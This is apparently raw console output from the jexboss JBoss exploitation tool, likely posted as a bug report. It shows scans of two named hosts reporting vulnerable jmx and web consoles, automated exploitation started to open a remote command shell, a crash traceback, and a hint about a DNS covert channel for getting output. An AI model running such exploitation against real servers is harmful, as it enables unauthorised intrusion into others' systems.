    This operation will provide a simple command shell to execute commands on the server..
    Continue only if you have permission!
    yes/NO ? yes
  • Sending exploit code to http://www.frauen-ficken.webcam-sex-chat.net. Please wait...
  • Successfully deployed code! Starting command shell. Please wait...
    • - - - - - - - - - - - - - - - - - - - LOL - - - - - - - - - - - - - - - - - - - - *
  • http://www.frauen-ficken.webcam-sex-chat.net:

Traceback (most recent call last):
  File "jexboss.py", line 523, in <module>
    main()
  File "jexboss.py", line 372, in main
    auto_exploit(url, i)
  File "jexboss.py", line 221, in auto_exploit
    shell_http(url, exploit_type)
  File "jexboss.py", line 262, in shell_http
    resp += " " + str(r.data).split(">")[1]
IndexError: list index out of range

** Checking Host: http://188.165.0.15 **

  • Checking admin-console: [ EXPOSED ]
  • Checking web-console: [ VULNERABLE ]
  • Checking jmx-console: [ VULNERABLE ]
  • Checking JMXInvokerServlet: [ VULNERABLE ]
  • Do you want to try to run an automated exploitation via "jmx-console" ?
    This operation will provide a simple command shell to execute commands on the server..
    Continue only if you have permission!
    yes/NO ? yes
  • Sending exploit code to http://188.165.0.15. Please wait...
  • Successfully deployed code! Starting command shell. Please wait...
    • - - - - - - - - - - - - - - - - - - - LOL - - - - - - - - - - - - - - - - - - - - *
  • http://188.165.0.15:

Traceback (most recent call last):
  File "jexboss.py", line 523, in <module>
    main()
  File "jexboss.py", line 372, in main
    auto_exploit(url, i)
  File "jexboss.py", line 221, in auto_exploit
    shell_http(url, exploit_type)
  File "jexboss.py", line 262, in shell_http
    resp += " " + str(r.data).split(">")[1]
IndexError: list index out of range

Covert DNS Channel

Could not get command output. You need to set up an Authoritative DNS and try to get the
output of the commands via DNS covert channel.

new
